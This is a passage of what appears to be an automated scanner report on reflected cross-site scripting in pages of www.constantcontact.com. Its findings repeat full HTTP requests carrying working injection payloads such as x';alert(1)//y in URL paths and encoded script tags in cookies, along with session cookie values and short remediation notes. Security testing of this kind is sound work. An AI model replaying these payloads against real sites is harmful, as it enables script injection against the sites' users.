GET /learning-center/glossary/social-media/514c8'%3balert(1)//ec972dfd61a HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a0ae'%3balert(1)//cda7af06587 was submitted in the REST URL parameter 1. This input was echoed as 4a0ae';alert(1)//cda7af06587 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center4a0ae'%3balert(1)//cda7af06587/hints-tips/em/social.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddc5c'%3balert(1)//81c0d45acf4 was submitted in the REST URL parameter 2. This input was echoed as ddc5c';alert(1)//81c0d45acf4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/hints-tipsddc5c'%3balert(1)//81c0d45acf4/em/social.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94dd4'%3balert(1)//85f83fa80fd was submitted in the REST URL parameter 3. This input was echoed as 94dd4';alert(1)//85f83fa80fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/hints-tips/em94dd4'%3balert(1)//85f83fa80fd/social.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 602ed'%3balert(1)//53ad3272ded was submitted in the REST URL parameter 4. This input was echoed as 602ed';alert(1)//53ad3272ded in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/hints-tips/em/602ed'%3balert(1)//53ad3272ded HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abd62'%3balert(1)//e11b50c9e7d was submitted in the REST URL parameter 1. This input was echoed as abd62';alert(1)//e11b50c9e7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-centerabd62'%3balert(1)//e11b50c9e7d/hints-tips/ht-2010-05b.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cd34'%3balert(1)//7424eac80f3 was submitted in the REST URL parameter 2. This input was echoed as 9cd34';alert(1)//7424eac80f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/hints-tips9cd34'%3balert(1)//7424eac80f3/ht-2010-05b.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84907'%3balert(1)//ce7d48600e6 was submitted in the REST URL parameter 3. This input was echoed as 84907';alert(1)//ce7d48600e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/hints-tips/84907'%3balert(1)//ce7d48600e6 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6e15'%3balert(1)//00b3a0bb96d was submitted in the REST URL parameter 1. This input was echoed as d6e15';alert(1)//00b3a0bb96d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-centerd6e15'%3balert(1)//00b3a0bb96d/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79dcf'%3balert(1)//131f0d59576 was submitted in the REST URL parameter 2. This input was echoed as 79dcf';alert(1)//131f0d59576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /learning-center/79dcf'%3balert(1)//131f0d59576 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ebb0'%3balert(1)//c8ec20dba5b was submitted in the REST URL parameter 1. This input was echoed as 8ebb0';alert(1)//c8ec20dba5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /local8ebb0'%3balert(1)//c8ec20dba5b/index.jsp HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7edd1'%3balert(1)//2be00039de3 was submitted in the REST URL parameter 1. This input was echoed as 7edd1';alert(1)//2be00039de3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7edd1'%3balert(1)//2be00039de3 HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; cclp_content="lp_uid=20101124_21:29:13.262_F318E20503E8B28222E664EBA5008BBE.worker_landingPages|";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb19'%3balert(1)//42197b77f17 was submitted in the REST URL parameter 1. This input was echoed as cbb19';alert(1)//42197b77f17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mediacbb19'%3balert(1)//42197b77f17/pdf/get-started-building-your-social-media-presence.pdf?id=228t HTTP/1.1 Host: www.constantcontact.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=E7E6B217FA27DE6511C1D46A85B9CBB1.worker_landingPages; __utmz=152702054.1290653353.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/4|utmcmd=referral; cclp_partner="prt_02_ts=21510889|prt_01_ts=21510869|prt_03_ts=21510937|prt_03=partner.name::ROVING|prt_02=partner.name::ROVING|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=impcc::IMP_143029301421510|cc_01_ts=21456138|"; s_sq=%5B%5BB%5D%5D; impcc="IMP_143029301421510=21456138|"; cclp_referral="impcc=IMP_143029301421510|partner=ROVING|cc=IMP_143029301421510|pn=ROVING|sitereferrer=http://blogs.constantcontact.com/commentary?de329%22%3E%3Cscript%3Ealert(1)%3C/script%3Eebcb993e5f2=1|partner.name=ROVING|"; mbox=check#true#1290656325|session#1290656215273-380517#1290658125; s_cc=true; offer_temp=""; CPs200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; BIGipServerProdLP=2252739594.20480.0000; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Chttp%253A%252F%252Fburp%252Fshow%252F4%7C%252F47a5c%2527%25253balert%25281%2529%252F%252F945ccb545ca; s_vi=[CS]v1|2676E756851D0BBC-6000010980099150[CE]; gpv_p11=/47a5c; __utma=152702054.403905509.1290653353.1290653353.1290653353.1; __utmc=152702054; __utmb=152702054; ctctblog=1%3A%3A21510937; 